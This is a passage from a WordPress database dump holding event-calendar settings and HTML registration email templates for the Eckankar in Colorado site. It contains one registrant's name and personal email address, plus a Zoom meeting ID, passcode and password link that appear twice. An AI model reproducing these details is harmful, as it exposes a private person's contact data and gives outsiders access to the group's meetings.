rm_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(193046,269152,'_field_652','Brayall'),(193047,269152,'_field_653','cerelina35@gmail.com'),(182036,268425,'mec_tickets','a:0:{}'),(182037,268425,'mec_fees_global_inheritance','1'),(182038,268425,'mec_fees','a:0:{}'),(182039,268425,'mec_ticket_variations_global_inheritance','1'),(182040,268425,'mec_ticket_variations','a:0:{}'),(182041,268425,'mec_reg_fields_global_inheritance','1'),(182042,268425,'mec_reg_fields','a:0:{}'),(182043,268425,'mec_bfixed_fields','a:0:{}'),(182044,268425,'mec_op','a:0:{}'),(182045,268425,'mec_fields','a:0:{}'),(182046,268425,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9944:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(182047,268425,'mec_event_status','EventScheduled'),(182048,268425,'mec_moved_online_link',''),(182049,268425,'mec_cancelled_reason',''),(182050,268425,'mec_display_cancellation_reason_in_single_page',''),(182051,268425,'protect_children',''),(182052,268425,'passster_activate_global_protection',NULL),(182053,268425,'passster_activate_protection',NULL),(182054,268425,'passster_protection_type','password'),(182055,268425,'boldgrid_hide_page_title','0'),(182056,268425,'_thumbnail_id','266472'),(182057,268425,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(182058,268425,'boldgrid_in_page_containers','1'),(182061,268425,'_dp_original','266522'),(182060,268425,'passster_area_shortcode',''),(182062,268425,'_edit_lock','1696279376:2'),(182063,268425,'_edit_last','2'),(182064,268426,'mec_color',''),(182065,268426,'mec_location_id','185'),(182066,268426,'mec_dont_show_map','0'),(182067,268426,'mec_organizer_id','1'),(182068,268426,'mec_read_more',''),(182069,268426,'mec_more_info',''),(182070,268426,'mec_more_info_title',''),(182071,268426,'mec_more_info_target','_self'),(182072,268426,'mec_cost',''),(182073,268426,'mec_currency','a:0:{}'),(182074,268426,'mec_additional_organizer_ids','a:0:{}'),(182075,268426,'mec_additional_location_ids','a:0:{}'),(182076,268426,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-21\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-21\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182077,268426,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182078,268426,'mec_certain_weekdays','a:0:{}'),(182079,268426,'mec_allday','0'),(182080,268426,'one_occurrence','0'),(182081,268426,'mec_hide_time','0'),(182082,268426,'mec_hide_end_time','0'),(182083,268426,'mec_comment',''),(182084,268426,'mec_timezone','global'),(182085,268426,'mec_countdown_method','global'),(182086,268426,'mec_public','1'),(182087,268426,'mec_start_date','2023-05-21'),(182088,268426,'mec_start_time_hour','10'),(182089,268426,'mec_start_time_minutes','30'),(182090,268426,'mec_start_time_ampm','AM'),(182091,268426,'mec_start_day_seconds','37800'),(182092,268426,'mec_end_date','2023-05-21'),(182093,268426,'mec_end_time_hour','11'),(182094,268426,'mec_end_time_minutes','30'),(182095,268426,'mec_end_time_ampm','AM'),(182096,268426,'mec_end_day_seconds','41400'),(182097,268426,'mec_repeat_status','0'),(182098,268426,'mec_repeat_type',''),(182099,268426,'mec_repeat_interval','1'),(182100,268426,'mec_repeat_end',''),(182101,268426,'mec_repeat_end_at_occurrences',''),(182102,268426,'mec_repeat_end_at_date',''),(182103,268426,'mec_advanced_days','a:0:{}'),(182104,268426,'mec_in_days',''),(182105,268426,'mec_not_in_days',''),(182106,268426,'mec_hourly_schedules','a:0:{}'),(182107,268426,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182108,268426,'mec_tickets','a:0:{}'),(182109,268426,'mec_fees_global_inheritance','1'),(182110,268426,'mec_fees','a:0:{}'),(182111,268426,'mec_ticket_variations_global_inheritance','1'),(182112,268426,'mec_ticket_variations','a:0:{}'),(182113,268426,'mec_reg_fields_global_inheritance','1'),(182114,268426,'mec_reg_fields','a:0:{}'),(182115,268426,'mec_bfixed_fields','a:0:{}'),(182116,268426,'mec_op','a:0:{}'),(182117,268426,'mec_fields','a:0:{}'),(182118,268426,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; 